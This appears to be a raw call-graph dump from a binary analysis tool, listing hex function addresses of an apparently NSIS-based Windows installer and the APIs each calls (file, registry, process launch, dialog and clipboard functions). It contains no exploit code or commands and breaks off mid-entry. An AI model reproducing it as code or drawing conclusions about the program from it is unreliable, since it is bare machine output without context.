3507->3508 3509 403b8f ExitProcess 3508->3509 3510 405cf7 MessageBoxIndirectW 3508->3510 3510->3509 3512 401389 2 API calls 3511->3512 3513 401420 3512->3513 3513->3357 3515 40619a GetTickCount GetTempFileNameW 3514->3515 3516 4061d0 3515->3516 3517 403644 3515->3517 3516->3515 3516->3517 3517->3339 3518->3419 3519->3421 3520->3425 3522 403057 3521->3522 3523 40303f 3521->3523 3526 403067 GetTickCount 3522->3526 3527 40305f 3522->3527 3524 403048 DestroyWindow 3523->3524 3525 40304f 3523->3525 3524->3525 3525->3430 3525->3445 3555 4035fe SetFilePointer 3525->3555 3526->3525 3529 403075 3526->3529 3528 406a77 2 API calls 3527->3528 3528->3525 3530 4030aa CreateDialogParamW ShowWindow 3529->3530 3531 40307d 3529->3531 3530->3525 3531->3525 3556 403012 3531->3556 3533 40308b wsprintfW 3534 4056d0 24 API calls 3533->3534 3535 4030a8 3534->3535 3535->3525 3536->3443 3538 4033a2 3537->3538 3539 403386 SetFilePointer 3537->3539 3559 40347f GetTickCount 3538->3559 3539->3538 3542 40343f 3542->3445 3543 4061e1 ReadFile 3544 4033c2 3543->3544 3544->3542 3545 40347f 38 API calls 3544->3545 3546 4033d9 3545->3546 3546->3542 3547 403445 ReadFile 3546->3547 3549 4033e8 3546->3549 3547->3542 3549->3542 3550 4061e1 ReadFile 3549->3550 3551 406210 WriteFile 3549->3551 3550->3549 3551->3549 3553 4061e1 ReadFile 3552->3553 3554 4035fb 3553->3554 3554->3428 3555->3436 3557 403021 3556->3557 3558 403023 MulDiv 3556->3558 3557->3558 3558->3533 3560 4035d7 3559->3560 3561 4034ad 3559->3561 3562 40302e 32 API calls 3560->3562 3571 4035fe SetFilePointer 3561->3571 3568 4033a9 3562->3568 3564 4034b8 SetFilePointer 3567 4034dd 3564->3567 3565 4035e8 ReadFile 3565->3567 3566 40302e 32 API calls 3566->3567 3567->3565 3567->3566 3567->3568 3569 406210 WriteFile 3567->3569 3570 4035b8 SetFilePointer 3567->3570 3568->3542 3568->3543 3569->3567 3570->3560 3571->3564 3572->3453 3574 404007 3573->3574 3589 4065b5 wsprintfW 3574->3589 3576 404078 3590 4040ac 3576->3590 3578 403da8 3578->3459 3579 40407d 3579->3578 3580 4066ab 17 API calls 3579->3580 3580->3579 3581->3461 3593 404616 3582->3593 3584 4057c6 3588 4057ed 3584->3588 3596 401389 3584->3596 3585 404616 SendMessageW 3586 4057ff OleUninitialize 3585->3586 3586->3491 3588->3585 3589->3576 3591 4066ab 17 API calls 3590->3591 3592 4040ba SetWindowTextW 3591->3592 3592->3579 3594 40462e 3593->3594 3595 40461f SendMessageW 3593->3595 3594->3584 3595->3594 3598 401390 3596->3598 3597 4013fe 3597->3584 3598->3597 3599 4013cb MulDiv SendMessageW 3598->3599 3599->3598 3600 4040cb 3601 4040e3 3600->3601 3602 404244 3600->3602 3601->3602 3603 4040ef 3601->3603 3604 404295 3602->3604 3605 404255 GetDlgItem GetDlgItem 3602->3605 3608 4040fa SetWindowPos 3603->3608 3609 40410d 3603->3609 3607 4042ef 3604->3607 3617 401389 2 API calls 3604->3617 3676 4045ca 3605->3676 3611 404616 SendMessageW 3607->3611 3618 40423f 3607->3618 3608->3609 3612 404116 ShowWindow 3609->3612 3613 404158 3609->3613 3610 40427f KiUserCallbackDispatcher 3614 40140b 2 API calls 3610->3614 3619 404301 3611->3619 3620 404231 3612->3620 3621 404136 GetWindowLongW 3612->3621 3615 404160 DestroyWindow 3613->3615 3616 404177 3613->3616 3614->3604 3623 404574 3615->3623 3624 40417c SetWindowLongW 3616->3624 3625 40418d 3616->3625 3626 4042c7 3617->3626 3628 404555 DestroyWindow EndDialog 3619->3628 3631 40140b 2 API calls 3619->3631 3634 4066ab 17 API calls 3619->3634 3639 4045ca 18 API calls 3619->3639 3648 4045ca 18 API calls 3619->3648 3682 404631 3620->3682 3621->3620 3622 40414f ShowWindow 3621->3622 3622->3613 3623->3618 3632 404584 ShowWindow 3623->3632 3624->3618 3625->3620 3629 404199 GetDlgItem 3625->3629 3626->3607 3630 4042cb SendMessageW 3626->3630 3628->3623 3633 4041aa SendMessageW IsWindowEnabled 3629->3633 3635 4041c7 3629->3635 3630->3618 3631->3619 3632->3618 3633->3618 3633->3635 3634->3619 3636 4041cc 3635->3636 3637 4041d4 3635->3637 3640 40421b SendMessageW 3635->3640 3641 4041e7 3635->3641 3679 4045a3 3636->3679 3637->3636 3637->3640 3639->3619 3640->3620 3643 404204 3641->3643 3644 4041ef 3641->3644 3642 404202 3642->3620 3646 40140b 2 API calls 3643->3646 3645 40140b 2 API calls 3644->3645 3645->3636 3647 40420b 3646->3647 3647->3620 3647->3636 3649 40437c GetDlgItem 3648->3649 3650 404391 3649->3650 3651 404399 ShowWindow EnableWindow 3649->3651 3650->3651 3696 4045ec EnableWindow 3651->3696 3653 4043c3 EnableWindow 3658 4043d7 3653->3658 3654 4043dc GetSystemMenu EnableMenuItem SendMessageW 3655 40440c SendMessageW 3654->3655 3654->3658 3655->3658 3657 4040ac 18 API calls 3657->3658 3658->3654 3658->3657 3697 4045ff SendMessageW 3658->3697 3698 40666e lstrcpynW 3658->3698 3660 40443b lstrlenW 3661 4066ab 17 API calls 3660->3661 3662 404451 SetWindowTextW 3661->3662 3663 401389 2 API calls 3662->3663 3665 404462 3663->3665 3664 404495 DestroyWindow 3664->3623 3666 4044af CreateDialogParamW 3664->3666 3665->3618 3665->3619 3665->3664 3667 404490 3665->3667 3666->3623 3668 4044e2 3666->3668 3667->3618 3669 4045ca 18 API calls 3668->3669 3670 4044ed GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3669->3670 3671 401389 2 API calls 3670->3671 3672 404533 3671->3672 3672->3618 3673 40453b ShowWindow 3672->3673 3674 404616 SendMessageW 3673->3674 3675 404553 3674->3675 3675->3623 3677 4066ab 17 API calls 3676->3677 3678 4045d5 SetDlgItemTextW 3677->3678 3678->3610 3680 4045b0 SendMessageW 3679->3680 3681 4045aa 3679->3681 3680->3642 3681->3680 3683 404649 GetWindowLongW 3682->3683 3684 4046f4 3682->3684 3683->3684 3685 40465e 3683->3685 3684->3618 3685->3684 3686 40468b GetSysColor 3685->3686 3687 40468e 3685->3687 3686->3687 3688 404694 SetTextColor 3687->3688 3689 40469e SetBkMode 3687->3689 3688->3689 3690 4046b6 GetSysColor 3689->3690 3691 4046bc 3689->3691 3690->3691 3692 4046c3 SetBkColor 3691->3692 3693 4046cd 3691->3693 3692->3693 3693->3684 3694 4046e0 DeleteObject 3693->3694 3695 4046e7 CreateBrushIndirect 3693->3695 3694->3695 3695->3684 3696->3653 3697->3658 3698->3660 3821 4016cc 3822 402da6 17 API calls 3821->3822 3823 4016d2 GetFullPathNameW 3822->3823 3824 4016ec 3823->3824 3830 40170e 3823->3830 3827 4069a4 2 API calls 3824->3827 3824->3830 3825 401723 GetShortPathNameW 3826 402c2a 3825->3826 3828 4016fe 3827->3828 3828->3830 3831 40666e lstrcpynW 3828->3831 3830->3825 3830->3826 3831->3830 3832 401e4e GetDC 3833 402d84 17 API calls 3832->3833 3834 401e60 GetDeviceCaps MulDiv ReleaseDC 3833->3834 3835 402d84 17 API calls 3834->3835 3836 401e91 3835->3836 3837 4066ab 17 API calls 3836->3837 3838 401ece CreateFontIndirectW 3837->3838 3839 402638 3838->3839 3840 402950 3841 402da6 17 API calls 3840->3841 3843 40295c 3841->3843 3842 402972 3845 406139 2 API calls 3842->3845 3843->3842 3844 402da6 17 API calls 3843->3844 3844->3842 3846 402978 3845->3846 3868 40615e GetFileAttributesW CreateFileW 3846->3868 3848 402985 3849 402a3b 3848->3849 3852 4029a0 GlobalAlloc 3848->3852 3853 402a23 3848->3853 3850 402a42 DeleteFileW 3849->3850 3851 402a55 3849->3851 3850->3851 3852->3853 3854 4029b9 3852->3854 3855 403377 40 API calls 3853->3855 3869 4035fe SetFilePointer 3854->3869 3857 402a30 CloseHandle 3855->3857 3857->3849 3858 4029bf 3859 4035e8 ReadFile 3858->3859 3860 4029c8 GlobalAlloc 3859->3860 3861 4029d8 3860->3861 3862 402a0c 3860->3862 3863 403377 40 API calls 3861->3863 3864 406210 WriteFile 3862->3864 3867 4029e5 3863->3867 3865 402a18 GlobalFree 3864->3865 3865->3853 3866 402a03 GlobalFree 3866->3862 3867->3866 3868->3848 3869->3858 3870 401956 3871 402da6 17 API calls 3870->3871 3872 40195d lstrlenW 3871->3872 3873 402638 3872->3873 3874 4014d7 3875 402d84 17 API calls 3874->3875 3876 4014dd Sleep 3875->3876 3878 402c2a 3876->3878 3879 4020d8 3880 40219c 3879->3880 3881 4020ea 3879->3881 3884 401423 24 API calls 3880->3884 3882 402da6 17 API calls 3881->3882 3883 4020f1 3882->3883 3885 402da6 17 API calls 3883->3885 3889 4022f6 3884->3889 3886 4020fa 3885->3886 3887 402110 LoadLibraryExW 3886->3887 3888 402102 GetModuleHandleW 3886->3888 3887->3880 3890 402121 3887->3890 3888->3887 3888->3890 3899 406aaa 3890->3899 3893 402132 3896 401423 24 API calls 3893->3896 3897 402142 3893->3897 3894 40216b 3895 4056d0 24 API calls 3894->3895 3895->3897 3896->3897 3897->3889 3898 40218e FreeLibrary 3897->3898 3898->3889 3904 406690 WideCharToMultiByte 3899->3904 3901 406ac7 3902 40212c 3901->3902 3903 406ace GetProcAddress 3901->3903 3902->3893 3902->3894 3903->3902 3904->3901 3905 402b59 3906 402b60 3905->3906 3907 402bab 3905->3907 3909 402ba9 3906->3909 3911 402d84 17 API calls 3906->3911 3908 406a3b 5 API calls 3907->3908 3910 402bb2 3908->3910 3912 402da6 17 API calls 3910->3912 3913 402b6e 3911->3913 3914 402bbb 3912->3914 3915 402d84 17 API calls 3913->3915 3914->3909 3916 402bbf IIDFromString 3914->3916 3918 402b7a 3915->3918 3916->3909 3917 402bce 3916->3917 3917->3909 3923 40666e lstrcpynW 3917->3923 3922 4065b5 wsprintfW 3918->3922 3920 402beb CoTaskMemFree 3920->3909 3922->3909 3923->3920 3924 402a5b 3925 402d84 17 API calls 3924->3925 3926 402a61 3925->3926 3927 402aa4 3926->3927 3928 402a88 3926->3928 3935 40292e 3926->3935 3929 402abe 3927->3929 3930 402aae 3927->3930 3931 402a8d 3928->3931 3932 402a9e 3928->3932 3934 4066ab 17 API calls 3929->3934 3933 402d84 17 API calls 3930->3933 3938 40666e lstrcpynW 3931->3938 3932->3935 3939 4065b5 wsprintfW 3932->3939 3933->3932 3934->3932 3938->3935 3939->3935 3940 403cdb 3941 403ce6 3940->3941 3942 403cea 3941->3942 3943 403ced GlobalAlloc 3941->3943 3943->3942 3712 40175c 3713 402da6 17 API calls 3712->3713 3714 401763 3713->3714 3715 40618d 2 API calls 3714->3715 3716 40176a 3715->3716 3717 40618d 2 API calls 3716->3717 3717->3716 3944 401d5d 3945 402d84 17 API calls 3944->3945 3946 401d6e SetWindowLongW 3945->3946 3947 402c2a 3946->3947 3948 4028de 3949 4028e6 3948->3949 3950 4028ea FindNextFileW 3949->3950 3952 4028fc 3949->3952 3951 402943 3950->3951 3950->3952 3954 40666e lstrcpynW 3951->3954 3954->3952 3955 401563 3956 402ba4 3955->3956 3959 4065b5 wsprintfW 3956->3959 3958 402ba9 3959->3958 3960 401968 3961 402d84 17 API calls 3960->3961 3962 40196f 3961->3962 3963 402d84 17 API calls 3962->3963 3964 40197c 3963->3964 3965 402da6 17 API calls 3964->3965 3966 401993 lstrlenW 3965->3966 3968 4019a4 3966->3968 3967 4019e5 3968->3967 3972 40666e lstrcpynW 3968->3972 3970 4019d5 3970->3967 3971 4019da lstrlenW 3970->3971 3971->3967 3972->3970 3973 40166a 3974 402da6 17 API calls 3973->3974 3975 401670 3974->3975 3976 4069a4 2 API calls 3975->3976 3977 401676 3976->3977 3978 402aeb 3979 402d84 17 API calls 3978->3979 3981 402af1 3979->3981 3980 40292e 3981->3980 3982 4066ab 17 API calls 3981->3982 3982->3980 3983 4026ec 3984 402d84 17 API calls 3983->3984 3985 4026fb 3984->3985 3986 402745 ReadFile 3985->3986 3987 4061e1 ReadFile 3985->3987 3989 402785 MultiByteToWideChar 3985->3989 3990 40283a 3985->3990 3992 4027ab SetFilePointer MultiByteToWideChar 3985->3992 3993 40284b 3985->3993 3995 402838 3985->3995 3996 40623f SetFilePointer 3985->3996 3986->3985 3986->3995 3987->3985 3989->3985 4005 4065b5 wsprintfW 3990->4005 3992->3985 3994 40286c SetFilePointer 3993->3994 3993->3995 3994->3995 3997 40625b 3996->3997 4004 406273 3996->4004 3998 4061e1 ReadFile 3997->3998 3999 406267 3998->3999 4000 4062a4 SetFilePointer 3999->4000 4001 40627c SetFilePointer 3999->4001 3999->4004 4000->4004 4001->4000 4002 406287 4001->4002 4003 406210 WriteFile 4002->4003 4003->4004 4004->3985 4005->3995 3718 40176f 3719 402da6 17 API calls 3718->3719 3720 401776 3719->3720 3721 401796 3720->3721 3722 40179e 3720->3722 3757 40666e lstrcpynW 3721->3757 3758 40666e lstrcpynW 3722->3758 3725 40179c 3729 4068f5 5 API calls 3725->3729 3726 4017a9 3727 405f3d 3 API calls 3726->3727 3728 4017af lstrcatW 3727->3728 3728->3725 3745 4017bb 3729->3745 3730 4069a4 2 API calls 3730->3745 3731 406139 2 API calls 3731->3745 3733 4017cd CompareFileTime 3733->3745 3734 40188d 3736 4056d0 24 API calls 3734->3736 3735 401864 3737 4056d0 24 API calls 3735->3737 3746 401879 3735->3746 3739 401897 3736->3739 3737->3746 3738 40666e lstrcpynW 3738->3745 3740 403377 40 API calls 3739->3740 3741 4018aa 3740->3741 3742 4018be SetFileTime 3741->3742 3744 4018d0 FindCloseChangeNotification 3741->3744 3742->3744 3743 4066ab 17 API calls 3743->3745 3744->3746 3747 4018e1 3744->3747 3745->3730 3745->3731 3745->3733 3745->3734 3745->3735 3745->3738 3745->3743 3753 405cce MessageBoxIndirectW 3745->3753 3756 40615e GetFileAttributesW CreateFileW 3745->3756 3748 4018e6 3747->3748 3749 4018f9 3747->3749 3751 4066ab 17 API calls 3748->3751 3750 4066ab 17 API calls 3749->3750 3752 401901 3750->3752 3754 4018ee lstrcatW 3751->3754 3755 405cce MessageBoxIndirectW 3752->3755 3753->3745 3754->3752 3755->3746 3756->3745 3757->3725 3758->3726 4006 401a72 4007 402d84 17 API calls 4006->4007 4008 401a7b 4007->4008 4009 402d84 17 API calls 4008->4009 4010 401a20 4009->4010 4011 401573 4012 401583 ShowWindow 4011->4012 4013 40158c 4011->4013 4012->4013 4014 402c2a 4013->4014 4015 40159a ShowWindow 4013->4015 4015->4014 4016 404a74 4017 404a84 4016->4017 4018 404aaa 4016->4018 4019 4045ca 18 API calls 4017->4019 4020 404631 8 API calls 4018->4020 4021 404a91 SetDlgItemTextW 4019->4021 4022 404ab6 4020->4022 4021->4018 4023 4023f4 4024 402da6 17 API calls 4023->4024 4025 402403 4024->4025 4026 402da6 17 API calls 4025->4026 4027 40240c 4026->4027 4028 402da6 17 API calls 4027->4028 4029 402416 GetPrivateProfileStringW 4028->4029 4030 4014f5 SetForegroundWindow 4031 402c2a 4030->4031 4032 401ff6 4033 402da6 17 API calls 4032->4033 4034 401ffd 4033->4034 4035 4069a4 2 API calls 4034->4035 4036 402003 4035->4036 4038 402014 4036->4038 4039 4065b5 wsprintfW 4036->4039 4039->4038 4040 401b77 4041 402da6 17 API calls 4040->4041 4042 401b7e 4041->4042 4043 402d84 17 API calls 4042->4043 4044 401b87 wsprintfW 4043->4044 4045 402c2a 4044->4045 4046 40167b 4047 402da6 17 API calls 4046->4047 4048 401682 4047->4048 4049 402da6 17 API calls 4048->4049 4050 40168b 4049->4050 4051 402da6 17 API calls 4050->4051 4052 401694 MoveFileW 4051->4052 4053 4016a7 4052->4053 4059 4016a0 4052->4059 4054 4069a4 2 API calls 4053->4054 4055 4022f6 4053->4055 4057 4016b6 4054->4057 4056 401423 24 API calls 4056->4055 4057->4055 4058 40642e 36 API calls 4057->4058 4058->4059 4059->4056 4060 4019ff 4061 402da6 17 API calls 4060->4061 4062 401a06 4061->4062 4063 402da6 17 API calls 4062->4063 4064 401a0f 4063->4064 4065 401a16 lstrcmpiW 4064->4065 4066 401a28 lstrcmpW 4064->4066 4067 401a1c 4065->4067 4066->4067 4068 4022ff 4069 402da6 17 API calls 4068->4069 4070 402305 4069->4070 4071 402da6 17 API calls 4070->4071 4072 40230e 4071->4072 4073 402da6 17 API calls 4072->4073 4074 402317 4073->4074 4075 4069a4 2 API calls 4074->4075 4076 402320 4075->4076 4077 402331 lstrlenW lstrlenW 4076->4077 4078 402324 4076->4078 4080 4056d0 24 API calls 4077->4080 4079 4056d0 24 API calls 4078->4079 4082 40232c 4078->4082 4079->4082 4081 40236f SHFileOperationW 4080->4081 4081->4078 4081->4082 4083 401000 4084 401037 BeginPaint GetClientRect 4083->4084 4085 40100c DefWindowProcW 4083->4085 4086 4010f3 4084->4086 4090 401179 4085->4090 4088 401073 CreateBrushIndirect FillRect DeleteObject 4086->4088 4089 4010fc 4086->4089 4088->4086 4091 401102 CreateFontIndirectW 4089->4091 4092 401167 EndPaint 4089->4092 4091->4092 4093 401112 6 API calls 4091->4093 4092->4090 4093->4092 4094 404700 lstrcpynW lstrlenW 4095 401d81 4096 401d94 GetDlgItem 4095->4096 4097 401d87 4095->4097 4100 401d8e 4096->4100 4098 402d84 17 API calls 4097->4098 4098->4100 4099 401dd5 GetClientRect LoadImageW SendMessageW 4103 401e33 4099->4103 4105 401e3f 4099->4105 4100->4099 4101 402da6 17 API calls 4100->4101 4101->4099 4104 401e38 DeleteObject 4103->4104 4103->4105 4104->4105 4106 401503 4107 40150b 4106->4107 4109 40151e 4106->4109 4108 402d84 17 API calls 4107->4108 4108->4109 4110 402383 4111 40238a 4110->4111 4113 40239d 4110->4113 4112 4066ab 17 API calls 4111->4112 4114 402397 4112->4114 4115 405cce MessageBoxIndirectW 4114->4115 4115->4113 4116 402c05 SendMessageW 4117 402c1f InvalidateRect 4116->4117 4118 402c2a 4116->4118 4117->4118 4119 404789 4121 4048bb 4119->4121 4122 4047a1 4119->4122 4120 404925 4123 4049ef 4120->4123 4124 40492f GetDlgItem 4120->4124 4121->4120 4121->4123 4130 4048f6 GetDlgItem SendMessageW 4121->4130 4125 4045ca 18 API calls 4122->4125 4129 404631 8 API calls 4123->4129 4126 4049b0 4124->4126 4127 404949 4124->4127 4128 404808 4125->4128 4126->4123 4133 4049c2 4126->4133 4127->4126 4132 40496f SendMessageW LoadCursorW SetCursor 4127->4132 4131 4045ca 18 API calls 4128->4131 4143 4049ea 4129->4143 4152 4045ec EnableWindow 4130->4152 4136 404815 CheckDlgButton 4131->4136 4156 404a38 4132->4156 4138 4049d8 4133->4138 4139 4049c8 SendMessageW 4133->4139 4135 404920 4153 404a14 4135->4153 4150 4045ec EnableWindow 4136->4150 4138->4143 4144 4049de SendMessageW 4138->4144 4139->4138 4144->4143 4145 404833 GetDlgItem 4151 4045ff SendMessageW 4145->4151 4147 404849 SendMessageW 4148 404866 GetSysColor 4147->4148 4149 40486f SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4147->4149 4148->4149 4149->4143 4150->4145 4151->4147 4152->4135 4154 404a22 4153->4154 4155 404a27 SendMessageW 4153->4155 4154->4155 4155->4120 4159 405c94 ShellExecuteExW 4156->4159 4158 40499e LoadCursorW SetCursor 4158->4126 4159->4158 4160 40248a 4161 402da6 17 API calls 4160->4161 4162 40249c 4161->4162 4163 402da6 17 API calls 4162->4163 4164 4024a6 4163->4164 4177 402e36 4164->4177 4167 4024de 4168 4024ea 4167->4168 4172 402d84 17 API calls 4167->4172 4173 402509 RegSetValueExW 4168->4173 4174 403377 40 API calls 4168->4174 4169 40292e 4170 402da6 17 API calls 4171 4024d4 lstrlenW 4170->4171 4171->4167 4172->4168 4175 40251f RegCloseKey 4173->4175 4174->4173 4175->4169 4178 402e51 4177->4178 4181 406509 4178->4181 4182 406518 4181->4182 4183 406523 RegCreateKeyExW 4182->4183 4184 4024b6 4182->4184 4183->4184 4184->4167 4184->4169 4184->4170 4185 40290b 4186 402da6 17 API calls 4185->4186 4187 402912 FindFirstFileW 4186->4187 4188 40293a 4187->4188 4192 402925 4187->4192 4193 4065b5 wsprintfW 4188->4193 4190 402943 4194 40666e lstrcpynW 4190->4194 4193->4190 4194->4192 4195 40190c 4196 401943 4195->4196 4197 402da6 17 API calls 4196->4197 4198 401948 4197->4198 4199 405d7a 67 API calls 4198->4199 4200 401951 4199->4200 4201 40190f 4202 402da6 17 API calls 4201->4202 4203 401916 4202->4203 4204 405cce MessageBoxIndirectW 4203->4204 4205 40191f 4204->4205 4206 40580f 4207 405830 GetDlgItem GetDlgItem GetDlgItem 4206->4207 4208 4059b9 4206->4208 4251 4045ff SendMessageW 4207->4251 4210 4059c2 GetDlgItem CreateThread CloseHandle 4208->4210 4211 4059ea 4208->4211 4210->4211 4213 405a01 ShowWindow ShowWindow 4211->4213 4214 405a3a 4211->4214 4215 405a15 4211->4215 4212 4058a0 4217 4058a7 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4212->4217 4253 4045ff SendMessageW 4213->4253 4221 404631 8 API calls 4214->4221 4216 405a75 4215->4216 4219 405a29 4215->4219 4220 405a4f ShowWindow 4215->4220 4216->4214 4226 405a83 SendMessageW 4216->4226 4224 405915 4217->4224 4225 4058f9 SendMessageW SendMessageW 4217->4225 4227 4045a3 SendMessageW 4219->4227 4222 405a61 4220->4222 4223 405a6f 4220->4223 4228 405a48 4221->4228 4229 4056d0 24 API calls 4222->4229 4230 4045a3 SendMessageW 4223->4230 4231 405928 4224->4231 4232 40591a SendMessageW 4224->4232 4225->4224 4226->4228 4233 405a9c CreatePopupMenu 4226->4233 4227->4214 4229->4223 4230->4216 4235 4045ca 18 API calls 4231->4235 4232->4231 4234 4066ab 17 API calls 4233->4234 4236 405aac AppendMenuW 4234->4236 4237 405938 4235->4237 4238 405ac9 GetWindowRect 4236->4238 4239 405adc TrackPopupMenu 4236->4239 4240 405941 ShowWindow 4237->4240 4241 405975 GetDlgItem SendMessageW 4237->4241 4238->4239 4239->4228 4243 405af7 4239->4243 4244 405964 4240->4244 4245 405957 ShowWindow 4240->4245 4241->4228 4242 40599c SendMessageW SendMessageW 4241->4242 4242->4228 4246 405b13 SendMessageW 4243->4246 4252 4045ff SendMessageW 4244->4252 4245->4244 4246->4246 4248 405b30 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4246->4248 4249 405b55 SendMessageW 4248->4249 4249->4249 4250 405b7e GlobalUnlock SetClipboardData CloseClipboard 4249->4250 4250->4228 4251->4212 4252->4241 4253->4215 4254 404e11 4255 404e21 4254->4255 4256 404e3d 4254->4256 4265 405cb2 GetDlgItemTextW 4255->4265 4258 404e70 4256->4258 4259 404e43 SHGetPathFromIDListW 4256->4259 4261 404e5a SendMessageW 4259->4261 4262 404e53 4259->4262 4260 404e2e SendMessageW 4260->4256 4261->4258 4264 40140b 2 API calls 4262->4264 4264->4261 4265->4260 4266 401491 4267 4056d0 24 API calls 4266->4267 4268 401498 4267->4268 4269 402891 4270 402898 4269->4270 4271 402ba9 4269->4271 4272 402d84 17 API calls 4270->4272 4273 40289f 4272->4273 4274 4028ae SetFilePointer 4273->4274 4274->4271 4275 4028be 4274->4275 4277 4065b5 wsprintfW 4275->4277 4277->4271 4278 401f12 4279 402da6 17 API calls 4278->4279 4280 401f18 4279->4280 4281 402da6 17 API calls 4280->4281 4282 401f21 4281->4282 4283 402da6 17 API calls 4282->4283 4284 401f2a 4283->4284 4285 402da6 17 API calls 4284->4285 4286 401f33 4285->4286 4287 401423 24 API calls 4286->4287 4288 401f3a 4287->4288 4295 405c94 ShellExecuteExW 4288->4295 4290 401f82 4291 406ae6 5 API calls 4290->4291 4293 40292e 4290->4293 4292 401f9f CloseHandle 4291->4292 4292->4293 4295->4290 4296 402f93 4297 402fa5 SetTimer 4296->4297 4298 402fbe 4296->4298 4297->4298 4299 40300c 4298->4299 4300 403012 MulDiv 4298->4300 4301 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4300->4301 4301->4299 4303 401d17 4304 402d84 17 API calls 4303->4304 4305 401d1d IsWindow 4304->4305 4306 401a20 4305->4306 4307 401b9b 4308 401ba8 4307->4308 4309 401bec 4307->4309 4310 401c31 4308->4310 4317 401bbf 4308->4317 4311 401bf1 4309->4311 4312 401c16 GlobalAlloc 4309->4312 4313 4066ab 17 API calls 4310->4313 4321 40239d 4310->4321 4311->4321 4328 40666e lstrcpynW 4311->4328 4314 4066ab 17 API calls 4312->4314 4315 402397 4313->4315 4314->4310 4320 405cce MessageBoxIndirectW 4315->4320 4326 40666e lstrcpynW 4317->4326 4318 401c03 GlobalFree 4318->4321 4320->4321 4322 401bce 4327 40666e lstrcpynW 4322->4327 4324 401bdd 4329 40666e lstrcpynW 4324->4329 4326->4322 4327->4324 4328->4318 4329->4321 4330 40261c 4331 402da6 17 API calls 4330->4331 4332 402623 4331->4332 4335 40615e GetFileAttributesW CreateFileW 4332->4335 4334 40262f 4335->4334 4336 40149e 4337 4014ac PostQuitMessage 4336->4337 4338 40239d 4336->4338 4337->4338 4339 40259e 4349 402de6 4339->4349 4342 402d84 17 API calls 4343 4025b1 4342->4343 4344 4025d9 RegEnumValueW 4343->4344 4345 4025cd RegEnumKeyW 4343->4345 4347 40292e 4343->4347 4346 4025ee RegCloseKey 4344->4346 4345->4346 4346->4347 4350 402da6 17 API calls 4349->4350 4351 402dfd 4350->4351 4352 4064db RegOpenKeyExW 4351->4352 4353 4025a8 4352->4353 4353->4342 4354 4015a3 4355 402da6 17 API calls 4354->4355 4356 4015aa SetFileAttributesW 4355->4356 4357 4015bc 4356->4357 3287 401fa4 3288 402da6 17 API calls 3287->3288 3289 401faa 3288->3289 3290 4056d0 24 API calls 3289->3290 3291 401fb4 3290->3291 3302 405c51 CreateProcessW 3291->3302 3294 401fdd CloseHandle 3298 40292e 3294->3298 3297 401fcf 3299 401fd4 3297->3299 3300 401fdf 3297->3300 3310 4065b5 wsprintfW 3299->3310 3300->3294 3303 401fba 3302->3303 3304 405c84 CloseHandle 3302->3304 3303->3294 3303->3298 3305 406ae6 WaitForSingleObject 3303->3305 3304->3303 3306 406b00 3305->3306 3307 406b12 GetExitCodeProcess 3306->3307 3311 406a77 3306->3311 3307->3297 3310->3294 3312 406a94 PeekMessageW 3311->3312 3313 406aa4 WaitForSingleObject 3312->3313 3314 406a8a DispatchMessageW 3312->3314 3313->3306 3314->3312 4358 40202a 4359 402da6 17 API calls 4358->4359 4360 402031 4359->4360 4361 406a3b 5 API calls 4360->4361 4362 402040 4361->4362 4363 4020cc 4362->4363 4364 40205c GlobalAlloc 4362->4364 4364->4363 4365 402070 4364->4365 4366 406a3b 5 API calls 4365->4366 4367 402077 4366->4367 4368 406a3b 5 API calls 4367->4368 4369 402081 4368->4369 4369->4363 4373 4065b5 wsprintfW 4369->4373 4371 4020ba 4374 4065b5 wsprintfW 4371->4374 4373->4371 4374->4363 4375 40252a 4376 402de6 17 API calls 4375->4376 4377 402534 4376->4377 4378 402da6 17 API calls 4377->4378 4379 40253d 4378->4379 4380 402548 RegQueryValueExW 4379->4380 4383 40292e 4379->4383 4381 402568 4380->4381 4382 40256e RegCloseKey 4380->4382 4381->4382 4386 4065b5 wsprintfW 4381->4386 4382->4383 4386->4382 4387 4021aa 4388 402da6 17 API calls 4387->4388 4389 4021b1 4388->4389 4390 402da6 17 API calls 4389->4390 4391 4021bb 4390->4391 4392 402da6 17 API calls 4391->4392 4393 4021c5 4392->4393 4394 402da6 17 API calls 4393->4394 4395 4021cf 4394->4395 4396 402da6 17 API calls 4395->4396 4397 4021d9 4396->4397 4398 402218 CoCreateInstance 4397->4398 4399 402da6 17 API calls 4397->4399 4402 402237 4398->4402 4399->4398 4400 401423 24 API calls 4401 4022f6 4400->4401 4402->4400 4402->4401 3699 403c2b 3700 403c46 3699->3700 3701 403c3c CloseHandle 3699->3701 3702 403c50 CloseHandle 3700->3702 3703 403c5a 3700->3703 3701->3700 3702->3703 3708 403c88 3703->3708 3706 405d7a 67 API calls 3707 403c6b 3706->3707 3709 403c96 3708->3709 3710 403c5f 3709->3710 3711 403c9b FreeLibrary GlobalFree 3709->3711 3710->3706 3711->3710 3711->3711 4403 401a30 4404 402da6 17 API calls 4403->4404 4405 401a39 ExpandEnvironmentStringsW 4404->4405 4406 401a4d 4405->4406 4408 401a60 4405->4408 4407 401a52 lstrcmpW 4406->4407 4406->4408 4407->4408 4414 4023b2 4415 4023c0 4414->4415 4416 4023ba 4414->4416 4418 4023ce 4415->4418 4419 402da6 17 API calls 4415->4419 4417 402da6 17 API calls 4416->4417 4417->4415 4420 4023dc 4418->4420 4422 402da6 17 API calls 4418->4422 4419->4418 4421 402da6 17 API calls 4420->4421 4423 4023e5 WritePrivateProfileStringW 4421->4423 4422->4420 4424 402434 4425 402467 4424->4425 4426 40243c 4424->4426 4428 402da6 17 API calls 4425->4428 4427 402de6 17 API calls 4426->4427 4429 402443 4427->4429 4430 40246e 4428->4430 4432 40247b 4429->4432 4433 402da6 17 API calls 4429->4433 4435 402e64 4430->4435 4434 402454 RegDeleteValueW RegCloseKey 4433->4434 4434->4432 4436 402e78 4435->4436 4438 402e71 4435->4438 4436->4438 4439 402ea9 4436->4439 4438->4432 4440 4064db RegOpenKeyExW 4439->4440 4441 402ed7 4440->4441 4442 402f81 4441->4442 4443 402ee7 RegEnumValueW 4441->4443 4447 402f0a 4441->4447 4442->4438 4444 402f71 RegCloseKey 4443->4444 4443->4447 4444->4442 4445 402f46 RegEnumKeyW 4446 402f4f RegCloseKey 4445->4446 4445->4447 4448 406a3b 5 API calls 4446->4448 4447->4444 4447->4445 4447->4446 4449 402ea9 6 API 